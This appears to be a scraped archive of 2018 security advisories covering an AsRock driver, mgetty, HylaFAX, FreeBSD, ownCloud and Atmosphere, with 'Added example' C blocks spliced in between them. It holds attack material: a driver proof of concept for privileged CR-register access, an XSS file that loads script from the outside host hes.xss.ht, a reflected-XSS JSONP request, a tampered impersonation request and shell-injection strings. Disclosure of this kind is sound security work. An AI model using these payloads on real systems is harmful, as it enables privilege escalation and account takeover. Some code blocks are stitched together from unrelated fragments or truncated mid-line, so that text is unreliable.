[CVE-2018-10709]

AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
 
/-
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers

#include <windows.h>
#include <stdio.h>

#define IOCTL_ASROCK_READCR 0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_CR_STRUCT {
    ULONG64 reg;
    ULONG64 value;
} ASROCK_CR_STRUCT;

#pragma pack(pop)

// Sends the caller's inbuffer to the driver and returns the second
// ULONG64 of the output buffer
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, (size), \
                    (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return outbuffer[1];

ULONG64 ASROCK_ReadCR(DWORD reg)
{
    ASROCK_CR_STRUCT  inbuffer = { 3, 0};
    IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}

ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
    ASROCK_CR_STRUCT  inbuffer = { reg, value};
    IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object '%s' - GetLastError:%d\n",
               szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");

    if (!InitDriver()) {
   

X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty

2018-09-19 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-007

Multiple Vulnerabilities in mgetty
==


Overview
--------
Confirmed Affected Versions: 1.2.0
Patched Versions: 1.2.1
Vendor: mgetty
Vendor URL: http://mgetty.greenie.net
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty


Summary and Impact
------------------
Multiple issues have been identified in the mgetty fax software. These
might be used by local users to elevate their privileges.
X41 did not perform a full test or audit on the software.


Product Description
-------------------
From the vendor: For those of you that do not know mgetty+sendfax yet:
it's a reliable and proven fax send and receive solution for unix and
Linux. But it can do much more... so read the docs and be surprised.

Shell injection via faxq-helper
===
Severity Rating: Medium
Vector: Fax Job
CVE: CVE-2018-16741
CWE: 78
CVSS Score: 6.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
In fax/faxq-helper.c function do_activate(), not all characters are
properly sanitized to prevent command injection. It is possible to use
||, && or > to change the control flow.

{% highlight c %}
/* replace all quote characters, backslash and ';' by ' ' */
for( q = buf; *q != '\0'; q++ )
{
    if ( *q == '\'' || *q == '"' || *q == '`' ||
         *q == '\\' || *q == ';' )
        { *q = ' '; }
}
{% endhighlight %}

A job file containing malicious input can be constructed using
faxq-helper activate. Once faxrunq is started, the code is executed as
the user running the command.
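Added example, not mgetty code: the do_activate() filter above reproduced in C beside an allowlist check, run on constructed job-field strings. It shows that blanking quotes, backslash and ';' stops a ';' separator but leaves '||', '&&' and '>' intact, which the allowlist rejects; the allowlist's permitted character set is an assumption of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Mirrors the advisory's do_activate() loop: blank a fixed set of
 * shell metacharacters in place. */
static void denylist_sanitize(char *buf)
{
    for (char *q = buf; *q != '\0'; q++) {
        if (*q == '\'' || *q == '"' || *q == '`' || *q == '\\' || *q == ';')
            *q = ' ';
    }
}

/* Returns 1 if the string still carries a token that alters shell
 * control flow or redirects output; none of these are on the denylist. */
static int has_shell_control(const char *s)
{
    static const char *const tokens[] = {
        "||", "&&", "|", "&", ">", "<", "$(", "\n", NULL
    };
    for (int i = 0; tokens[i] != NULL; i++)
        if (strstr(s, tokens[i]) != NULL)
            return 1;
    return 0;
}

/* Copy, sanitise the way faxq-helper does, and report whether a
 * control-flow token survived.  1 means the denylist was bypassed. */
static int denylist_bypassed(const char *field)
{
    char buf[256];
    snprintf(buf, sizeof buf, "%s", field);
    denylist_sanitize(buf);
    return has_shell_control(buf);
}

/* Hardened alternative: an allowlist for a fax job field (letters, digits,
 * space and the punctuation a phone number or file path needs; assumed set).
 * Returns 1 when every byte is permitted; on 0 the caller rejects the job
 * instead of trying to repair the string. */
static int allowlist_ok(const char *field)
{
    for (const char *q = field; *q != '\0'; q++) {
        unsigned char c = (unsigned char)*q;
        if (!(isalnum(c) || c == ' ' || c == '.' || c == '-' ||
              c == '_' || c == '/' || c == '@' || c == '+'))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed job field values; not taken from any real job file. */
    static const char *const samples[] = {
        "0123456789 document.ps",
        "0123456789; touch /tmp/x",
        "0123456789 || touch /tmp/x",
        "0123456789 > /tmp/x",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-30s denylist bypassed: %d  allowlist ok: %d\n", samples[i],
               denylist_bypassed(samples[i]), allowlist_ok(samples[i]));
    return 0;
}
```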

{% highlight bash %}
/* replace all quote characters, backslash and ';' by '' */
#   "   '\$   ;
command=tr -d '\042\047\140\134\044\073'  (pwd ? 0 : 1))
badlogin(tbuf);
failures = 0;
}
(void)strcpy(tbuf, username);
{% endhighlight %}


Stack Based Buffer Overflow With Long Argument in contrib/scrts.c
=
Severity Rating: Low
Vector: Command Line Parameter
CVE: CVE-2018-16742
CWE: 121
CVSS Score: 2.9
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
In file contrib/scrts.c a stack buffer overflow can be triggered via
command line parameter.

{% highlight c %}
int main( int argc, char ** argv )
{
int i, fd;
struct termios tio;
char device[1000];

for ( i=1; i/dev/null 2>&1", MAILER, mailto );
pipefp = popen( buf, "w" );
{% endhighlight %}


Endless loop in g3/g32pbm.c
===
When converting g32 files using g3/g32pbm.c, an endless loop can be
triggered by a malformed input file. An example can be found at
files/g32pmbinfiniteloop.

Out Of Bounds Access in g3/pbm2g3.c
===
When converting pbm files using g3/pbm2g3.c, out of bounds accesses
can occur with malformed input files in putwhitespan(). An example can
be found with files/pbm2g2oobaccess.

{% highlight c %}
 putcode( twhite[l].bitcode, twhite[l].bitlength );
{% endhighlight %}


Workaround
----------
None.


Timeline
--------
2018-06-07 Issues found
2018-08-27 Issue reported to vendor
2018-08-28 Vendor reply
2018-09-08 Vendor sends patches
2018-09-08 CVE IDs requested
2018-09-09 CVE IDs assigned
2018-09-11 Patched Version released
2018-09-11 Advisory released

About X41 D-SEC GmbH
--------------------
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and IT security consulting and support services are
core competencies of X41.

-- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier


X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX

2018-09-19 Thread X41 D-Sec GmbH Advisories
X41 D-SEC GmbH Security Advisory: X41-2018-008

Multiple Vulnerabilities in HylaFAX
===


Overview
--------
Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0
Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1
Vendor: Hylafax, Hylafax+
Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/
Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/


Summary and Impact
--
Severity Rating: Critical
Vector: Incoming fax call
CVE: CVE-2018-17141
CWE: 122, 457
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Multiple bugs were found in the code handling fax page reception in JPEG
format that allow arbitrary writes to an uninitialized pointer by remote
parties dialing in. When processing a specially crafted input, the issue
could lead to remote code execution.
Although JPEG reception is not announced as an available capability
by HylaFAX and is explicitly disabled during capabilities announcement,
there is code for JPEG support in HylaFAX that can be reached by a remote
party by setting certain flags during session negotiation.
X41 did not perform a full test or audit on the software.


Product Description
---
HylaFAX is an open-source system for sending and receiving faxes using
one or multiple fax modems.

Analysis
--------
X41 discovered several vulnerabilities in HylaFAX that are exploitable
by local or remote attackers.


Uninitialized pointer write in FaxModem::writeECMData()
---
In CopyQuality.c++:990 recvRow is initialized only when params.jp is
exactly JP_GREY or JP_COLOR and also params.df is exactly zero.

{% highlight c %}
uint dataform = params.df + (params.jp ? params.jp + 4 : 0);
//...
switch (dataform) {
//...
    case JPGREY+4:
    case JPCOLOR+4:
        recvEOLCount = 0;
        recvRow = (uchar*) malloc(1024*1000); // 1M should do it?
{% endhighlight %}
However, later in the same function recvRow is used as a target for
memcpy() when params.jp is JP_GREY or JP_COLOR, irrespective of
params.df.  Consequently, if a sender crafts a DCS signal that leads to
params.df being non-zero while params.jp is JP_GREY or JP_COLOR, then
recvRow will be uninitialized when it is used as a target for memcpy().
{% highlight c %}
if (params.jp != JPGREY && params.jp != JPCOLOR) {
    flushRawData(tif, 0, (const u_char*) buf, cc);
} else {
    memcpy(recvRow, (const char*) buf, cc);
    recvRow += cc;
}
{% endhighlight %}


Out of bounds write in FaxModem::writeECMData()
---
The same memcpy() at CopyQuality.c++:1045 can be abused to perform an
out of bounds write through recvRow, as there is no bounds check before
writing to and incrementing recvRow. This can lead to remote code
execution when an attacker sends a specially crafted input.
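Added model, not HylaFAX code, of the writeECMData() decisions in the two sections above: the vulnerable version allocates recvRow only when params.jp is JP_GREY or JP_COLOR and params.df is zero but uses it whenever params.jp is JP_GREY or JP_COLOR, while the checked version keys allocation and use on one predicate and bounds-checks every copy. The JP_* values and the 1M capacity are assumptions of the model, and the frame payloads are constructed zero bytes.

```c
#include <stdlib.h>
#include <string.h>

/* JPEG mode values for this model (assumed; HylaFAX's own constants may differ). */
enum { JP_NONE = 0, JP_GREY = 1, JP_COLOR = 2 };
#define RECVROW_CAP (1024 * 1000)      /* the "1M should do it?" buffer */

struct ecm_state {
    unsigned char *recvRow;   /* buffer start; NULL until allocated */
    size_t used;              /* bytes written so far */
    size_t cap;
};

static int is_jpeg(unsigned jp) { return jp == JP_GREY || jp == JP_COLOR; }

/* Vulnerable allocation predicate: JPEG mode and df exactly zero. */
static int vuln_allocates(unsigned df, unsigned jp) { return is_jpeg(jp) && df == 0; }

/* Vulnerable use predicate: JPEG mode alone, df ignored. */
static int vuln_uses_recvrow(unsigned df, unsigned jp) { (void)df; return is_jpeg(jp); }

/* 1 when the vulnerable code would memcpy() into a never-allocated recvRow. */
static int vuln_uninitialised_write(unsigned df, unsigned jp)
{
    return vuln_uses_recvrow(df, jp) && !vuln_allocates(df, jp);
}

/* Hardened write: a single predicate decides both allocation and use,
 * and the copy is bounds-checked.  Returns bytes copied, 0 when the
 * raw (non-JPEG) path applies, -1 when the frame is rejected. */
static long ecm_write_checked(struct ecm_state *st, unsigned df, unsigned jp,
                              const unsigned char *buf, size_t cc)
{
    if (!is_jpeg(jp))
        return 0;
    if (df != 0)                  /* JPEG with non-zero df: inconsistent negotiation */
        return -1;
    if (st->recvRow == NULL) {
        st->recvRow = malloc(RECVROW_CAP);
        if (st->recvRow == NULL)
            return -1;
        st->cap = RECVROW_CAP;
        st->used = 0;
    }
    if (cc > st->cap - st->used)  /* would run past the end of recvRow */
        return -1;
    memcpy(st->recvRow + st->used, buf, cc);
    st->used += cc;
    return (long)cc;
}

/* Drive two consecutive ECM writes of n1 and n2 constructed zero bytes
 * and return the verdict of the second one. */
static long write_twice(unsigned df, unsigned jp, size_t n1, size_t n2)
{
    struct ecm_state st = { NULL, 0, 0 };
    size_t n = n1 > n2 ? n1 : n2;
    unsigned char *data = calloc(n ? n : 1, 1);
    long r = -1;
    if (data != NULL) {
        ecm_write_checked(&st, df, jp, data, n1);
        r = ecm_write_checked(&st, df, jp, data, n2);
    }
    free(data);
    free(st.recvRow);
    return r;
}
```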


Out of bounds write in FaxModem::recvPageDLEData()
--
CopyQuality.c++:446 presents another unbounded memcpy() that can be
abused to perform an out of bounds write through recvRow.

{% highlight c %}
if (n >= RCVBUFSIZ)
    flushRawData(tif, 0, (const u_char*) raw, n);
else {
    memcpy(recvRow, (const char*) raw, n);
    recvRow += n;
}
{% endhighlight %}

This code does not seem to be reachable, as the JPEG flag forces ECM
reception.


Workaround
--
None.

Timeline
--------
2018-06-07 Issues found
2018-08-24 Issue reported to vendor
2018-09-02 Vendor sends patches
2018-09-17 CVE ID assigned
2018-09-18 Patches released
2018-09-19 Advisory released

External links
==
See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this
advisory.





FreeBSD Security Advisory FreeBSD-SA-18:12.elf

2018-09-12 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:12.elfSecurity Advisory
  The FreeBSD Project

Topic:  Improper ELF header parsing

Category:   core
Module: kernel
Announced:  2018-09-12
Credits:Thomas Barabosch, Fraunhofer FKIE; Mark Johnston
Affects:All supported versions of FreeBSD.
Corrected:  2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE)
2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3)
2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14)
2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE)
2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12)
CVE Name:   CVE-2018-6924

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

To execute a binary the kernel must parse the ELF header to determine the
entry point address, the program interpreter, and other parameters.

II.  Problem Description

Insufficient validation was performed in the ELF header parser, and malformed
or otherwise invalid ELF binaries were not rejected as they should be.

III. Impact

Execution of a malicious ELF binary may result in a kernel crash or may
disclose kernel memory.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and
reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch
# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc
# gpg --verify elf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r338605
releng/10.4/                                                      r338606
stable/11/                                                        r338604
releng/11.1/                                                      r338606
releng/11.2/                                                      r338606
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc>


CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass

2018-08-30 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk: High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz 
# Date: 29.08.2018
#
#


Introduction:
-
ownCloud [1] is a suite of client-server software for creating file hosting 
services and using them. An app called Impersonate [2] was created to allow 
administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access 
users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to 
impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even 
though they shouldn't.


Affected:
-
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed for the older versions to be 
vulnerable too.


Technical Description
-
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins 
to impersonate users from these groups" and add the two groups "group1" and 
"group2".

Log in with "test1", open the user page and impersonate the user "test2". 
There, intercept the POST request to /apps/impersonate/user and replace 
"target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though 
"test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=

Response:
=
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 
'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: 
blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=


Workaround / Fix:
-
Check the authorization consistently so that group admins cannot
impersonate users from other groups.
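Added example, not ownCloud code: a C model of the server-side check the fix above calls for, using the advisory's two groups and four users. The submitted "target" is only a lookup key; the verdict comes from which groups the acting admin administers, which groups the global admin allowed for impersonation, and the target's membership. That a global admin may impersonate any non-admin, and the constructed "admin" user, are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define MAX_GROUPS 4

struct user {
    const char *name;
    const char *groups[MAX_GROUPS];    /* member of (NULL-terminated) */
    const char *admin_of[MAX_GROUPS];  /* group admin of (NULL-terminated) */
    int is_global_admin;
};

static int in_list(const char *const *list, const char *g)
{
    for (int i = 0; i < MAX_GROUPS && list[i] != NULL; i++)
        if (strcmp(list[i], g) == 0)
            return 1;
    return 0;
}

/* Server-side decision for POST /apps/impersonate/user.  A group admin may
 * impersonate a user only through a group that the admin administers, that
 * is on the allowed list, and that the target belongs to.  Global admins
 * are never impersonable; a request's "target" value alone grants nothing. */
static int may_impersonate(const struct user *actor, const struct user *target,
                           const char *const *allowed_groups)
{
    if (target->is_global_admin || actor == target)
        return 0;
    if (actor->is_global_admin)   /* assumption: global admins may impersonate any non-admin */
        return 1;
    for (int i = 0; i < MAX_GROUPS && actor->admin_of[i] != NULL; i++) {
        const char *g = actor->admin_of[i];
        if (in_list(allowed_groups, g) && in_list(target->groups, g))
            return 1;
    }
    return 0;
}

/* The advisory's reproduction fixture: group1/group2, test1..test4, and
 * both groups enabled for "Allow group admins to impersonate users from
 * these groups".  "admin" is a constructed global administrator. */
static const struct user users[] = {
    { "test1", { "group1", NULL }, { "group1", NULL }, 0 },
    { "test2", { "group1", NULL }, { NULL },           0 },
    { "test3", { "group2", NULL }, { "group2", NULL }, 0 },
    { "test4", { "group2", NULL }, { NULL },           0 },
    { "admin", { NULL },           { NULL },           1 },
};
static const char *const allowed_groups[] = { "group1", "group2", NULL };

static const struct user *find_user(const char *name)
{
    for (size_t i = 0; i < sizeof users / sizeof users[0]; i++)
        if (strcmp(users[i].name, name) == 0)
            return &users[i];
    return NULL;
}

/* 1 = allowed, 0 = denied, -1 = unknown user (a caller treats it as denied). */
static int decide(const char *actor_name, const char *target_name)
{
    const struct user *a = find_user(actor_name);
    const struct user *t = find_user(target_name);
    if (a == NULL || t == NULL)
        return -1;
    return may_impersonate(a, t, allowed_groups);
}
```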


Timeline:
-
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz


References:
---
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] 
https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html


CSNC-2018-016 - ownCloud iOS Application - Cross-Site Scripting

2018-08-15 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud iOS Application (owncloud.iosapp) [1]
# Vendor:   ownCloud Gmbh
# CSNC ID:  CSNC-2018-016
# CVE ID:   N/A
# Subject:  Cross-Site Scripting in ownCloud iOS Application's WebViews
# Risk: Low
# Effect:   Remotely exploitable
# Author:   Sylvain Heiniger 
# Date: 14.08.2018
#
#

Introduction:
-
HTML pages will be rendered in a WebView in the ownCloud iOS application.
JavaScript will be executed in this WebView when previewing an HTML file.

The WebView runs in a sandbox, so a priori no other data can be read.
However, if the WebView itself had a vulnerability, an attacker could
access other data of the application. The HTML rendering could also be
misused for phishing.

Affected:
-
Vulnerable:
 * ownCloud Version 3.7.3 for iOS

Not vulnerable:
 * ownCloud Android Application
 * ownCloud Server
 * ownCloud Version 3.7.5 for iOS


Technical Description
-
Upload an HTML file to an ownCloud instance and open it in the iOS
application; the HTML gets interpreted.

$ cat test.html
<script src="https://hes.xss.ht"></script>
<script>alert("this JavaScript is interpreted!");</script>

$ dave -u admin -p [password] https://[your-instance].owncloud-demo.com/remote.php/webdav/
dave> put test.html
  put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117 bytes) (success)


Workaround / Fix:
-
Since iOS 8 the WKWebView class can be used instead of UIWebView. Setting
the WKPreferences property javaScriptEnabled to false prevents JavaScript
from running.
This fix was implemented in release 3.7.5 [2].


Timeline:
-
2018-08-14: Advisory publication
2018-07-09: Fix verification
2018-06-19: Release with fix publication
2018-03-16: Initial acknowledgment of the vulnerability
2018-03-14: Contact via HackerOne
2018-03-13: Discovery by Sylvain Heiniger


References:
---
[1] https://github.com/owncloud/ios
[2] https://github.com/owncloud/ios/releases/tag/version_3.7.5


CSNC-2018-023 - Atmosphere Framework - Reflected Cross-Site Scripting (XSS)

2018-08-15 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:   Atmosphere [1]
# Vendor:Async-IO.org
# CSNC ID:   CSNC-2018-023
# Subject:   Reflected Cross-Site Scripting (XSS)
# Risk:  High
# Effect:Remotely exploitable
# Author:Lukasz D. (advisor...@compass-security.com)
# Date:  13.08.2018
#
#

Introduction:
-
The Atmosphere Framework is the most popular asynchronous application
development framework for enterprise Java. The Atmosphere Framework provides
the enterprise features required to build massive scalable and real time
asynchronous applications using transports like WebSocket, Server Sent Events
and traditional Ajax Techniques. [2]

Web applications using the Atmosphere Framework were found to be vulnerable to a
common security flaw that allows an attacker to execute malicious code in the
browser of users that followed a manipulated link to access the application.
Exploiting the vulnerability allows the attacker, for instance, to redirect the
user to a phishing page or interact with the application on behalf of the user.

Affected:
-
The following Atmosphere versions are vulnerable:
- 2.4.0 - 2.4.28
- 2.3.0 - 2.3.9
- 2.2.0 - 2.2.12
- 2.1.0 - 2.1.13
- 2.0.0 - 2.0.11
- 1.0.0 - 1.0.20

Technical Description:
--
The JSONP transport method supported by the Atmosphere Framework is vulnerable
to a reflected Cross-Site Scripting (XSS) attack. The JSONP callback parameter
that will be put into the server's response can contain HTML code. As the
response does not specify the content type, it may be treated as an HTML page by
browsers. For example, Firefox 52 ESR will execute JavaScript payload reflected
in the response in the following proof of concept:

Request:
GET /chat?X-Atmosphere-Transport=jsonp&
  jsonpTransport=%3Chtml%3E%3Cbody%20onload=alert(`XSS`)%3E&
  X-Atmosphere-tracking-id=1&
  X-Atmosphere-Framework=1&
  X-atmo-protocol=true HTTP/1.1
Host: [CUT]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Atmosphere-tracking-id: 1
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Date: Mon, 16 Jul 2018 13:37:00 GMT
Connection: close
Content-Length: 52

<html><body onload=alert(`XSS`)>({"message" : "X"});

Workaround / Fix:
-
It needs to be ensured that all JSONP responses are delivered with the correct
HTTP header: "Content-Type: application/javascript; charset=utf-8". Moreover,
the JSONP callback function name should not contain any non-alphanumeric
characters.
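Added example, not Atmosphere code: a callback-name check and response builder in C applying the fix above (alphanumeric callback names only, so underscores and dots are rejected too, plus the required Content-Type header), run on the reflected callback from the proof of concept. The X-Content-Type-Options header and the 64-character length cap are additions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Callback name policy from the advisory's fix: alphanumerics only.
 * The length cap (assumed) keeps the name from being used as padding. */
static int jsonp_callback_ok(const char *cb)
{
    size_t n = strlen(cb);
    if (n == 0 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)cb[i]))
            return 0;
    return 1;
}

/* Writes the complete JSONP response (status line, headers, body) into out.
 * Returns the number of bytes written, or -1 when the callback is rejected
 * or out is too small.  The Content-Type is the one the advisory requires;
 * the body is cb(json); */
static int build_jsonp_response(const char *cb, const char *json,
                                char *out, size_t cap)
{
    if (!jsonp_callback_ok(cb))
        return -1;
    int body_len = (int)strlen(cb) + (int)strlen(json) + 3;   /* "(" and ");" */
    int n = snprintf(out, cap,
                     "HTTP/1.1 200 OK\r\n"
                     "Content-Type: application/javascript; charset=utf-8\r\n"
                     "X-Content-Type-Options: nosniff\r\n"
                     "Content-Length: %d\r\n"
                     "\r\n"
                     "%s(%s);", body_len, cb, json);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}

/* Builds the response for (cb, json) and checks that the required
 * Content-Type header and the expected body are present.  Returns 1/0. */
static int response_well_formed(const char *cb, const char *json)
{
    char out[512], body[256];
    if (build_jsonp_response(cb, json, out, sizeof out) < 0)
        return 0;
    snprintf(body, sizeof body, "\r\n\r\n%s(%s);", cb, json);
    return strstr(out, "Content-Type: application/javascript; charset=utf-8\r\n") != NULL
        && strstr(out, body) != NULL;
}

int main(void)
{
    char out[512];
    /* The advisory's reflected callback versus a well-formed one. */
    const char *bad  = "<html><body onload=alert(`XSS`)>";
    const char *good = "jsonpTransport1";
    printf("reflected callback accepted: %d\n", jsonp_callback_ok(bad));
    if (build_jsonp_response(good, "{\"message\" : \"X\"}", out, sizeof out) > 0)
        printf("%s\n", out);
    return 0;
}
```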

Timeline:
-
2018-07-16:   Vulnerability discovered
2018-07-18:   Initial vendor notification
2018-07-18:   Initial vendor response
2018-07-20:   Patched version released
2018-08-13:   Public disclosure

References:
---
[1]: https://github.com/Atmosphere
[2]: https://async-io.org/


FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd

2018-08-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:11.hostapdSecurity Advisory
  The FreeBSD Project

Topic:  Unauthenticated EAPOL-Key Decryption Vulnerability

Category:   contrib
Module: wpa
Announced:  2018-08-14
Credits:Mathy Vanhoef of the imec-DistriNet research group of
KU Leuven
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE)
2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE)
2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:   CVE-2018-14526

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The wpa_supplicant(8) utility is a client (supplicant) with support for WPA
and WPA2 (IEEE 802.11i / RSN).  It is suitable for both desktop and laptop
